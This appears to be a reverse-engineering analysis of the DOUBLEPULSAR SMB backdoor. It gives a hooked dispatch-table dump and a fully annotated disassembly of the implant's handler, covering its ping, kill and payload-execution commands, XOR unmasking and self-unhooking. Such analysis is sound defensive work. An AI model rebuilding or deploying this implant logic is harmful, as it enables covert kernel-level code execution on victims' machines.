DOUBLEPULSAR - ETERNALBLUE - SmbHandler()
Thanks to https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html#pulsar_step5 for the description | |
kd> dps srv!SrvTransaction2DispatchTable | |
91463530 9148b56f srv!SrvSmbOpen2 | |
91463534 91485fe4 srv!SrvSmbFindFirst2 | |
91463538 9148606d srv!SrvSmbFindNext2 | |
9146353c 91488a89 srv!SrvSmbQueryFsInformation | |
91463540 914892f3 srv!SrvSmbSetFsInformation | |
91463544 9147ff65 srv!SrvSmbQueryPathInformation | |
91463548 91480c74 srv!SrvSmbSetPathInformation | |
9146354c 9147f77c srv!SrvSmbQueryFileInformation | |
91463550 9148055d srv!SrvSmbSetFileInformation | |
91463554 914894e5 srv!SrvSmbFindNotify | |
91463558 9148697a srv!SrvSmbIoctl2 | |
9146355c 914894e5 srv!SrvSmbFindNotify | |
91463560 914894e5 srv!SrvSmbFindNotify | |
91463564 914815fb srv!SrvSmbCreateDirectory2 | |
91463568 83f9f048 <==== the only populated slot that does not resolve to a srv! symbol (table base + 38h) | |
9146356c 9148bf2b srv!SrvTransactionNotImplemented | |
91463570 91472107 srv!SrvSmbGetDfsReferral | |
91463574 91471ff7 srv!SrvSmbReportDfsInconsistency | |
91463578 00000000 | |
.rdata:0041ACF5 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041ACF5 | |
.rdata:0041ACF5 | |
.rdata:0041ACF5 SmbDoublePulsarHandler proc near | |
.rdata:0041ACF5 ; Handler sitting in the srv!SrvTransaction2DispatchTable slot marked <==== in the dump above. | |
.rdata:0041ACF5 ; Position-independent: ebp is set to the 4 KiB-aligned base of the page holding this code and | |
.rdata:0041ACF5 ; all state lives in fixed slots relative to that base: | |
.rdata:0041ACF5 ;   [ebp+08h] allocation routine, called as (0, size)  - no caller clean-up, so stdcall | |
.rdata:0041ACF5 ;   [ebp+0Ch] release routine, called as (ptr)         - no caller clean-up, so stdcall | |
.rdata:0041ACF5 ;   [ebp+10h] pointer to a block whose +3Ch holds the code pointer this handler tail-jumps to; | |
.rdata:0041ACF5 ;             presumably the dispatch-table base shown above (base+38h = hooked slot, | |
.rdata:0041ACF5 ;             base+3Ch = SrvTransactionNotImplemented) - confirm | |
.rdata:0041ACF5 ;   [ebp+24h] 32-bit value handed back by PING and rotated after every completed EXEC | |
.rdata:0041ACF5 ;   [ebp+28h] XOR mask derived from [ebp+24h] by sub_41AE55 | |
.rdata:0041ACF5 ;   [ebp+2Ch] staged payload buffer, [ebp+30h] its size (both zero while nothing is staged) | |
.rdata:0041ACF5 ;   [ebp+34h] copy of arg_4 | |
.rdata:0041ACF5 ;   [ebp+38h] response block located by sub_41AEE6; fields +0Eh/+12h/+1Eh are written below | |
.rdata:0041ACF5 ;   [ebp+3Ch] request block located by sub_41AE96; fields -28h/-18h/-10h/+10h are read below | |
.rdata:0041ACF5 ;   [ebp+44h] scratch shared by sub_41AEE6 and sub_41AE96 | |
.rdata:0041ACF5 ; Status is reported by ADDING 10h (ok) / 20h (bad request) / 30h (allocation failed) to the | |
.rdata:0041ACF5 ; 16-bit field at [ebp+38h]+1Eh. NOTE(review): if [ebp+38h] is the SMB response header, +0Eh is | |
.rdata:0041ACF5 ; SecurityFeatures and +1Eh is MultiplexID - the field the public DOUBLEPULSAR scanners check for | |
.rdata:0041ACF5 ; the +10h/+20h/+30h delta; confirm against the structure handed to the hooked entry. | |
.rdata:0041ACF5 ; Every register is saved by pusha; only the saved eax slot is rewritten before popa. | |
.rdata:0041ACF5 | |
.rdata:0041ACF5 var_4 = dword ptr -4 ; [esp+20h+var_4] = the eax slot inside the pusha frame | |
.rdata:0041ACF5 arg_4 = dword ptr 8 ; second stack argument of the hooked dispatch entry | |
.rdata:0041ACF5 | |
.rdata:0041ACF5 mov ecx, [esp+arg_4] ; ecx = arg_4, read before pusha moves esp | |
.rdata:0041ACF9 pusha ; save all GPRs (20h bytes); the eax slot is the top one | |
.rdata:0041ACFA call $+5 ; push eip (0041ACFF) ... | |
.rdata:0041ACFF pop ebp ; ... and pop it: ebp = address of this instruction | |
.rdata:0041AD00 and bp, 0F000h ; clear the low 12 bits: ebp = 4 KiB-aligned base of this code's page | |
.rdata:0041AD05 mov [ebp+34h], ecx ; stash arg_4 | |
.rdata:0041AD08 call sub_41AEE6 ; from arg_4: set [ebp+38h] and [ebp+44h]; ecx preserved | |
.rdata:0041AD0D call sub_41AE55 ; [ebp+28h] = mask derived from [ebp+24h] | |
.rdata:0041AD12 call sub_41AE96 ; locate the request block via [ebp+44h]; eax = 1 on success | |
.rdata:0041AD17 test eax, eax | |
.rdata:0041AD19 jz loc_41AE02 ; not a backdoor request: pass through untouched | |
.rdata:0041AD1F mov ebx, [ebp+3Ch] ; ebx = request block | |
.rdata:0041AD22 mov ecx, [ebx-28h] ; ecx = 32-bit opcode field | |
.rdata:0041AD25 call sub_41AE41 ; al = sum of the four bytes of ecx | |
.rdata:0041AD2A cmp al, 23h ; PING | |
.rdata:0041AD2C jz short CMD_PING | |
.rdata:0041AD2E cmp al, 77h ; KILL | |
.rdata:0041AD30 jz short CMD_KILL | |
.rdata:0041AD32 cmp al, 0C8h ; EXEC | |
.rdata:0041AD34 jz short CMD_EXEC | |
.rdata:0041AD36 jmp CMD_INVALID ; any other byte sum: status 20h | |
.rdata:0041AD3B ; --------------------------------------------------------------------------- | |
.rdata:0041AD3B | |
.rdata:0041AD3B CMD_PING: ; CODE XREF: SmbDoublePulsarHandler+37j | |
.rdata:0041AD3B mov ecx, [ebp+38h] ; ecx = response block | |
.rdata:0041AD3E mov eax, [ebp+24h] | |
.rdata:0041AD41 mov [ecx+0Eh], eax ; hand back the 32-bit [ebp+24h] value at +0Eh of the response ... | |
.rdata:0041AD44 xor eax, eax | |
.rdata:0041AD46 mov [ecx+12h], al ; ... and zero the byte that follows it | |
.rdata:0041AD49 jmp PING ; status 10h | |
.rdata:0041AD4E ; --------------------------------------------------------------------------- | |
.rdata:0041AD4E | |
.rdata:0041AD4E CMD_KILL: ; CODE XREF: SmbDoublePulsarHandler+3Bj | |
.rdata:0041AD4E call EraseCode ; release the staged buffer and rewrite [[ebp+10h]+38h] | |
.rdata:0041AD53 jmp KILL ; finish with the self-release sequence below | |
.rdata:0041AD58 ; --------------------------------------------------------------------------- | |
.rdata:0041AD58 | |
.rdata:0041AD58 CMD_EXEC: ; CODE XREF: SmbDoublePulsarHandler+3Fj | |
.rdata:0041AD58 mov ebx, [ebp+3Ch] ; ebx = request block | |
.rdata:0041AD5B mov eax, [ebx-18h] ; eax -> three masked dwords describing this chunk | |
.rdata:0041AD5E mov esi, [eax] | |
.rdata:0041AD60 xor esi, [ebp+28h] ; esi = total payload size | |
.rdata:0041AD63 mov edi, [eax+8] | |
.rdata:0041AD66 xor edi, [ebp+28h] ; edi = offset of this chunk inside the payload | |
.rdata:0041AD69 mov eax, [eax+4] | |
.rdata:0041AD6C xor eax, [ebp+28h] ; eax = length of this chunk | |
.rdata:0041AD6F cmp eax, [ebx+10h] ; must equal the length field at +10h of the request block | |
.rdata:0041AD72 mov ebx, eax ; ebx = chunk length (mov leaves the flags intact) | |
.rdata:0041AD74 jnz short CMD_INVALID | |
.rdata:0041AD76 mov ecx, [ebp+30h] ; ecx = size of the currently staged buffer | |
.rdata:0041AD79 cmp ecx, esi | |
.rdata:0041AD7B mov eax, [ebp+2Ch] ; eax = staged buffer (flags intact) | |
.rdata:0041AD7E jz short loc_41AD98 ; same total size: keep using it | |
.rdata:0041AD80 call sub_41AE77 ; otherwise release it ... | |
.rdata:0041AD85 lea eax, [esi+4] ; ... and allocate total+4 (slack for the dword-wise unmask below) | |
.rdata:0041AD88 push eax | |
.rdata:0041AD89 push 0 | |
.rdata:0041AD8B call dword ptr [ebp+8] ; eax = alloc(0, total+4); no add esp after, so the callee cleans up | |
.rdata:0041AD8E test eax, eax | |
.rdata:0041AD90 jz short loc_41ADF5 ; allocation failed: status 30h | |
.rdata:0041AD92 mov [ebp+2Ch], eax | |
.rdata:0041AD95 mov [ebp+30h], esi | |
.rdata:0041AD98 | |
.rdata:0041AD98 loc_41AD98: ; CODE XREF: SmbDoublePulsarHandler+89j | |
.rdata:0041AD98 add edi, ebx ; unsigned bounds check: offset+len must not exceed total | |
.rdata:0041AD9A cmp edi, esi | |
.rdata:0041AD9C ja short CMD_INVALID | |
.rdata:0041AD9E sub edi, ebx | |
.rdata:0041ADA0 add edi, eax ; edi = buffer+offset (destination) | |
.rdata:0041ADA2 push edi ; remember the destination start | |
.rdata:0041ADA3 mov edx, esi ; edx = total size | |
.rdata:0041ADA5 mov esi, [ebp+3Ch] | |
.rdata:0041ADA8 mov esi, [esi-10h] ; esi = chunk data pointer (field -10h of the request block) | |
.rdata:0041ADAB mov ecx, ebx | |
.rdata:0041ADAD rep movsb ; copy len bytes into the buffer (direction flag assumed clear) | |
.rdata:0041ADAF pop esi ; esi = destination start | |
.rdata:0041ADB0 mov ecx, ebx | |
.rdata:0041ADB2 shr ecx, 2 ; ecx = len/4: assumes len is a non-zero multiple of 4; remainder bytes stay masked | |
.rdata:0041ADB5 mov ebx, [ebp+28h] ; ebx = XOR mask | |
.rdata:0041ADB8 | |
.rdata:0041ADB8 loc_41ADB8: ; CODE XREF: SmbDoublePulsarHandler+C8j | |
.rdata:0041ADB8 xor [esi], ebx ; unmask the chunk in place, one dword at a time | |
.rdata:0041ADBA add esi, 4 | |
.rdata:0041ADBD loop loc_41ADB8 | |
.rdata:0041ADBF add eax, edx ; eax = buffer + total (end of payload) | |
.rdata:0041ADC1 cmp esi, eax | |
.rdata:0041ADC3 jl short PING ; not the last chunk: ack with 10h and wait for more (signed compare of addresses) | |
.rdata:0041ADC5 mov eax, [ebp+2Ch] ; last chunk written: transfer to the staged buffer | |
.rdata:0041ADC8 pusha | |
.rdata:0041ADC9 mov esi, esp ; esi = esp before the call, restored below whatever the callee pops | |
.rdata:0041ADCB push eax ; the buffer receives its own address as the single argument | |
.rdata:0041ADCC call eax | |
.rdata:0041ADCE mov esp, esi | |
.rdata:0041ADD0 popa | |
.rdata:0041ADD1 call sub_41AE77 ; zero-fill and release the buffer | |
.rdata:0041ADD6 mov eax, [ebp+24h] ; rotate the value behind the mask: | |
.rdata:0041ADD9 shr eax, 1 ; v >>= 1 | |
.rdata:0041ADDB xor ecx, ecx | |
.rdata:0041ADDD mov cl, al | |
.rdata:0041ADDF add ecx, ebp | |
.rdata:0041ADE1 mov ecx, [ecx] ; ecx = dword at page base + (v & 0FFh) | |
.rdata:0041ADE3 xor eax, ecx ; v ^= that dword | |
.rdata:0041ADE5 mov [ebp+24h], eax | |
.rdata:0041ADE8 call sub_41AE55 ; re-derive [ebp+28h]; falls through into PING (status 10h) | |
.rdata:0041ADED | |
.rdata:0041ADED PING: ; CODE XREF: SmbDoublePulsarHandler+54j | |
.rdata:0041ADED ; SmbDoublePulsarHandler+CEj | |
.rdata:0041ADED mov al, 10h ; status 10h: success | |
.rdata:0041ADEF jmp short CleanUp | |
.rdata:0041ADF1 ; --------------------------------------------------------------------------- | |
.rdata:0041ADF1 | |
.rdata:0041ADF1 CMD_INVALID: ; CODE XREF: SmbDoublePulsarHandler+41j | |
.rdata:0041ADF1 ; SmbDoublePulsarHandler+7Fj ... | |
.rdata:0041ADF1 mov al, 20h ; status 20h: unknown opcode or bad chunk geometry | |
.rdata:0041ADF3 jmp short CleanUp | |
.rdata:0041ADF5 ; --------------------------------------------------------------------------- | |
.rdata:0041ADF5 | |
.rdata:0041ADF5 loc_41ADF5: ; CODE XREF: SmbDoublePulsarHandler+9Bj | |
.rdata:0041ADF5 mov al, 30h ; status 30h: allocation failed | |
.rdata:0041ADF7 jmp short $+2 ; no-op: the target is simply the next instruction | |
.rdata:0041ADF9 ; --------------------------------------------------------------------------- | |
.rdata:0041ADF9 | |
.rdata:0041ADF9 CleanUp: ; CODE XREF: SmbDoublePulsarHandler+FAj | |
.rdata:0041ADF9 ; SmbDoublePulsarHandler+FEj ... | |
.rdata:0041ADF9 mov ecx, [ebp+38h] ; ecx = response block | |
.rdata:0041ADFC mov ah, 0 ; ax = status | |
.rdata:0041ADFE add [ecx+1Eh], ax ; report it by adding to the 16-bit field at +1Eh (see the header note) | |
.rdata:0041AE02 | |
.rdata:0041AE02 loc_41AE02: ; CODE XREF: SmbDoublePulsarHandler+24j | |
.rdata:0041AE02 mov eax, [ebp+10h] | |
.rdata:0041AE05 mov [esp+20h+var_4], eax ; overwrite the saved eax slot so popa yields eax = [ebp+10h] | |
.rdata:0041AE09 popa ; every other register and the original stack frame are restored | |
.rdata:0041AE0A jmp dword ptr [eax+3Ch] ; tail-jump to the code pointer at [ebp+10h]+3Ch with the original arguments | |
.rdata:0041AE0D ; --------------------------------------------------------------------------- | |
.rdata:0041AE0D | |
.rdata:0041AE0D KILL: ; CODE XREF: SmbDoublePulsarHandler+5Ej | |
.rdata:0041AE0D lea eax, [ebp+48h] ; eax = page base + 48h; the two stores below patch code, not data | |
.rdata:0041AE10 mov ecx, [ebp+0Ch] | |
.rdata:0041AE13 mov [eax+147h], ecx ; if this code starts at base+48h, eax+147h = 0041AE3C: the imm32 of `push 0` at 0041AE3B | |
.rdata:0041AE19 mov [eax+13Eh], ebp ; and eax+13Eh = 0041AE33: the imm32 of `push 0` at 0041AE32 (self-modifying; needs a W+X page) | |
.rdata:0041AE1F mov ax, 10h ; status 10h | |
.rdata:0041AE23 mov ecx, [ebp+38h] | |
.rdata:0041AE26 add [ecx+1Eh], ax ; same status field as CleanUp | |
.rdata:0041AE2A mov eax, [ebp+10h] | |
.rdata:0041AE2D mov [esp+20h+var_4], eax ; same trick as loc_41AE02: popa leaves eax = [ebp+10h] | |
.rdata:0041AE31 popa | |
.rdata:0041AE32 push 0 ; patched above to push the page base (argument of the release routine) | |
.rdata:0041AE37 mov eax, [eax+3Ch] ; eax = code pointer at [ebp+10h]+3Ch | |
.rdata:0041AE3A push eax ; pushed as the return address of the release routine | |
.rdata:0041AE3B push 0 ; patched above to the release routine from [ebp+0Ch] | |
.rdata:0041AE40 retn ; pops that address into eip: release(page base), then continue at [eax+3Ch] on the original stack | |
.rdata:0041AE40 SmbDoublePulsarHandler endp | |
.rdata:0041AE40 | |
.rdata:0041AE41 | |
.rdata:0041AE41 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AE41 | |
.rdata:0041AE41 | |
.rdata:0041AE41 sub_41AE41 proc near ; CODE XREF: SmbDoublePulsarHandler+30p | |
.rdata:0041AE41 ; In:  ecx = 32-bit opcode field of the request. | |
.rdata:0041AE41 ; Out: eax = (b0 + b1 + b2 + b3) & 0FFh, the byte sum of ecx; ecx is left as ecx >> 24. | |
.rdata:0041AE41 ; The caller compares the result with 23h / 77h / 0C8h. | |
.rdata:0041AE41 xor eax, eax | |
.rdata:0041AE43 mov al, cl ; byte 0 | |
.rdata:0041AE45 shr ecx, 8 | |
.rdata:0041AE48 add al, cl ; + byte 1 | |
.rdata:0041AE4A shr ecx, 8 | |
.rdata:0041AE4D add al, cl ; + byte 2 | |
.rdata:0041AE4F shr ecx, 8 | |
.rdata:0041AE52 add al, cl ; + byte 3 (carry out of al is discarded) | |
.rdata:0041AE54 retn | |
.rdata:0041AE54 sub_41AE41 endp | |
.rdata:0041AE54 | |
.rdata:0041AE55 | |
.rdata:0041AE55 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AE55 | |
.rdata:0041AE55 | |
.rdata:0041AE55 sub_41AE55 proc near ; CODE XREF: SmbDoublePulsarHandler+18p | |
.rdata:0041AE55 ; SmbDoublePulsarHandler+F3p | |
.rdata:0041AE55 ; Derives the XOR mask: [ebp+28h] = ([ebp+24h] << 1) ^ bswap([ebp+24h]). | |
.rdata:0041AE55 ; Preserves ecx; clobbers eax and flags. | |
.rdata:0041AE55 push ecx | |
.rdata:0041AE56 mov eax, [ebp+24h] | |
.rdata:0041AE59 mov ecx, eax | |
.rdata:0041AE5B bswap ecx ; ecx = byte-reversed value | |
.rdata:0041AE5D shl eax, 1 | |
.rdata:0041AE5F xor eax, ecx | |
.rdata:0041AE61 mov [ebp+28h], eax | |
.rdata:0041AE64 pop ecx | |
.rdata:0041AE65 retn | |
.rdata:0041AE65 sub_41AE55 endp | |
.rdata:0041AE65 | |
.rdata:0041AE66 | |
.rdata:0041AE66 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AE66 | |
.rdata:0041AE66 | |
.rdata:0041AE66 EraseCode proc near ; CODE XREF: SmbDoublePulsarHandler:CMD_KILLp | |
.rdata:0041AE66 ; KILL helper: releases the staged buffer, then copies the dword at [[ebp+10h]+3Ch] into [[ebp+10h]+38h]. | |
.rdata:0041AE66 ; NOTE(review): the dump above has the hooked slot at table base+38h and SrvTransactionNotImplemented | |
.rdata:0041AE66 ; at base+3Ch; if [ebp+10h] is that table base this store restores the slot (unhooks) - confirm. | |
.rdata:0041AE66 ; All registers preserved (pusha/popa). | |
.rdata:0041AE66 pusha | |
.rdata:0041AE67 call sub_41AE77 ; zero-fill and release [ebp+2Ch] if set | |
.rdata:0041AE6C mov eax, [ebp+10h] | |
.rdata:0041AE6F mov ecx, [eax+3Ch] | |
.rdata:0041AE72 mov [eax+38h], ecx ; [eax+38h] = [eax+3Ch] | |
.rdata:0041AE75 popa | |
.rdata:0041AE76 retn | |
.rdata:0041AE76 EraseCode endp | |
.rdata:0041AE76 | |
.rdata:0041AE77 | |
.rdata:0041AE77 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AE77 | |
.rdata:0041AE77 | |
.rdata:0041AE77 sub_41AE77 proc near ; CODE XREF: SmbDoublePulsarHandler+8Bp | |
.rdata:0041AE77 ; SmbDoublePulsarHandler+DCp ... | |
.rdata:0041AE77 ; Drops the staged buffer: if [ebp+2Ch] is non-zero, zero-fills [ebp+30h] bytes of it and passes it | |
.rdata:0041AE77 ; to the release routine at [ebp+0Ch]; then clears both slots. All registers preserved (pusha/popa); | |
.rdata:0041AE77 ; the direction flag is assumed clear for rep stosb. | |
.rdata:0041AE77 pusha | |
.rdata:0041AE78 mov ebx, [ebp+2Ch] ; ebx = staged buffer | |
.rdata:0041AE7B test ebx, ebx | |
.rdata:0041AE7D jz short loc_41AE8C ; nothing staged | |
.rdata:0041AE7F xor eax, eax | |
.rdata:0041AE81 mov edi, ebx | |
.rdata:0041AE83 mov ecx, [ebp+30h] ; ecx = its size | |
.rdata:0041AE86 rep stosb ; wipe the contents before handing the memory back | |
.rdata:0041AE88 push ebx | |
.rdata:0041AE89 call dword ptr [ebp+0Ch] ; release(ebx); no add esp after, so the callee cleans up | |
.rdata:0041AE8C | |
.rdata:0041AE8C loc_41AE8C: ; CODE XREF: sub_41AE77+6j | |
.rdata:0041AE8C xor eax, eax | |
.rdata:0041AE8E mov [ebp+30h], eax ; size = 0 | |
.rdata:0041AE91 mov [ebp+2Ch], eax ; buffer = 0 | |
.rdata:0041AE94 popa | |
.rdata:0041AE95 retn | |
.rdata:0041AE95 sub_41AE77 endp | |
.rdata:0041AE95 | |
.rdata:0041AE96 | |
.rdata:0041AE96 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AE96 | |
.rdata:0041AE96 | |
.rdata:0041AE96 sub_41AE96 proc near ; CODE XREF: SmbDoublePulsarHandler+1Dp | |
.rdata:0041AE96 ; Locates the request block. In: ecx = arg_4 (copied to edi but not used afterwards). | |
.rdata:0041AE96 ; Reads the dword at [ebp+44h] (set by sub_41AEE6) or, failing that, the one 8 bytes further, | |
.rdata:0041AE96 ; takes the first whose sign bit is set (sub_41AEDE) as a pointer p, and requires two consecutive | |
.rdata:0041AE96 ; dwords equal to 0Ch at p+54h or at p+58h. | |
.rdata:0041AE96 ; Out: eax = 1 and [ebp+3Ch] = address of that pair (the caller reads -28h/-18h/-10h/+10h | |
.rdata:0041AE96 ; relative to it); eax = 0 otherwise. [ebp+44h] is overwritten with p when the sign test passes. | |
.rdata:0041AE96 ; edi/edx/esi preserved; ecx clobbered. | |
.rdata:0041AE96 push edi | |
.rdata:0041AE97 push edx | |
.rdata:0041AE98 push esi | |
.rdata:0041AE99 mov edi, ecx ; dead store: edi is not read before it is popped | |
.rdata:0041AE9B mov edx, [ebp+44h] | |
.rdata:0041AE9E mov ecx, [edx] ; first candidate | |
.rdata:0041AEA0 call sub_41AEDE ; eax = 1 if ecx has its sign bit set | |
.rdata:0041AEA5 test eax, eax | |
.rdata:0041AEA7 jnz short loc_41AEB7 | |
.rdata:0041AEA9 add edx, 8 | |
.rdata:0041AEAC mov ecx, [edx] ; second candidate, 8 bytes further | |
.rdata:0041AEAE call sub_41AEDE | |
.rdata:0041AEB3 test eax, eax | |
.rdata:0041AEB5 jz short loc_41AED8 ; neither looks like a high-half pointer: fail | |
.rdata:0041AEB7 | |
.rdata:0041AEB7 loc_41AEB7: ; CODE XREF: sub_41AE96+11j | |
.rdata:0041AEB7 mov [ebp+44h], ecx ; [ebp+44h] = p | |
.rdata:0041AEBA push 0Ch | |
.rdata:0041AEBC pop eax ; eax = 0Ch (short encoding of mov eax, 0Ch) | |
.rdata:0041AEBD lea esi, [ecx+54h] | |
.rdata:0041AEC0 cmp eax, [esi] ; dword at p+54h == 0Ch ? | |
.rdata:0041AEC2 jz short loc_41AECB | |
.rdata:0041AEC4 add esi, 4 | |
.rdata:0041AEC7 cmp eax, [esi] ; else dword at p+58h == 0Ch ? | |
.rdata:0041AEC9 jnz short loc_41AED8 | |
.rdata:0041AECB | |
.rdata:0041AECB loc_41AECB: ; CODE XREF: sub_41AE96+2Cj | |
.rdata:0041AECB cmp eax, [esi+4] ; and the following dword must be 0Ch as well | |
.rdata:0041AECE jnz short loc_41AED8 | |
.rdata:0041AED0 mov [ebp+3Ch], esi ; [ebp+3Ch] = address of the (0Ch, 0Ch) pair | |
.rdata:0041AED3 xor eax, eax | |
.rdata:0041AED5 inc eax ; success | |
.rdata:0041AED6 jmp short loc_41AEDA | |
.rdata:0041AED8 ; --------------------------------------------------------------------------- | |
.rdata:0041AED8 | |
.rdata:0041AED8 loc_41AED8: ; CODE XREF: sub_41AE96+1Fj | |
.rdata:0041AED8 ; sub_41AE96+33j ... | |
.rdata:0041AED8 xor eax, eax ; failure | |
.rdata:0041AEDA | |
.rdata:0041AEDA loc_41AEDA: ; CODE XREF: sub_41AE96+40j | |
.rdata:0041AEDA pop esi | |
.rdata:0041AEDB pop edx | |
.rdata:0041AEDC pop edi | |
.rdata:0041AEDD retn | |
.rdata:0041AEDD sub_41AE96 endp | |
.rdata:0041AEDD | |
.rdata:0041AEDE | |
.rdata:0041AEDE ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AEDE | |
.rdata:0041AEDE | |
.rdata:0041AEDE sub_41AEDE proc near ; CODE XREF: sub_41AE96+Ap | |
.rdata:0041AEDE ; sub_41AE96+18p | |
.rdata:0041AEDE ; eax = 1 if ecx is negative as a signed 32-bit value (sign bit set), else 0. Clobbers flags only. | |
.rdata:0041AEDE xor eax, eax | |
.rdata:0041AEE0 cmp ecx, eax ; signed compare against 0 | |
.rdata:0041AEE2 jge short locret_41AEE5 ; ecx >= 0: return 0 | |
.rdata:0041AEE4 inc eax ; ecx < 0: return 1 | |
.rdata:0041AEE5 | |
.rdata:0041AEE5 locret_41AEE5: ; CODE XREF: sub_41AEDE+4j | |
.rdata:0041AEE5 retn | |
.rdata:0041AEE5 sub_41AEDE endp | |
.rdata:0041AEE5 | |
.rdata:0041AEE6 | |
.rdata:0041AEE6 ; =============== S U B R O U T I N E ======================================= | |
.rdata:0041AEE6 | |
.rdata:0041AEE6 | |
.rdata:0041AEE6 sub_41AEE6 proc near ; CODE XREF: SmbDoublePulsarHandler+13p | |
.rdata:0041AEE6 ; In: ecx = arg_4. Scans dwords upward from arg_4 for the first one equal to arg_4 + *(u16*)(arg_4+2) | |
.rdata:0041AEE6 ; ("match"); the scan has no upper bound and only stops on a hit. | |
.rdata:0041AEE6 ; Out: [ebp+44h] = (match + 1Ch + 7) & ~7 (rounded up to 8), [ebp+38h] = dword at match-8. | |
.rdata:0041AEE6 ; ecx and edx preserved; eax clobbered. | |
.rdata:0041AEE6 push edx | |
.rdata:0041AEE7 push ecx ; saved copy of arg_4, popped into edx below | |
.rdata:0041AEE8 xor edx, edx | |
.rdata:0041AEEA mov dx, [ecx+2] ; dx = 16-bit field at arg_4+2 | |
.rdata:0041AEEE add edx, ecx ; edx = arg_4 + that offset: the value to look for | |
.rdata:0041AEF0 | |
.rdata:0041AEF0 loc_41AEF0: ; CODE XREF: sub_41AEE6+11j | |
.rdata:0041AEF0 cmp edx, [ecx] | |
.rdata:0041AEF2 jz short loc_41AEF9 | |
.rdata:0041AEF4 add ecx, 4 ; next dword; no limit on how far this walks | |
.rdata:0041AEF7 jmp short loc_41AEF0 | |
.rdata:0041AEF9 ; --------------------------------------------------------------------------- | |
.rdata:0041AEF9 | |
.rdata:0041AEF9 loc_41AEF9: ; CODE XREF: sub_41AEE6+Cj | |
.rdata:0041AEF9 pop edx ; edx = arg_4 (the ecx pushed above) | |
.rdata:0041AEFA lea eax, [ecx+1Ch] | |
.rdata:0041AEFD add eax, 7 | |
.rdata:0041AF00 and al, 0F8h ; round match+1Ch up to a multiple of 8 (low byte is enough after the +7) | |
.rdata:0041AF02 mov [ebp+44h], eax | |
.rdata:0041AF05 mov eax, [ecx-8] | |
.rdata:0041AF08 mov [ebp+38h], eax ; [ebp+38h] = dword stored 8 bytes before the match | |
.rdata:0041AF0B mov ecx, edx ; restore ecx = arg_4 | |
.rdata:0041AF0D pop edx ; restore the caller's edx | |
.rdata:0041AF0E retn | |
.rdata:0041AF0E sub_41AEE6 endp | |
.rdata:0041AF0E |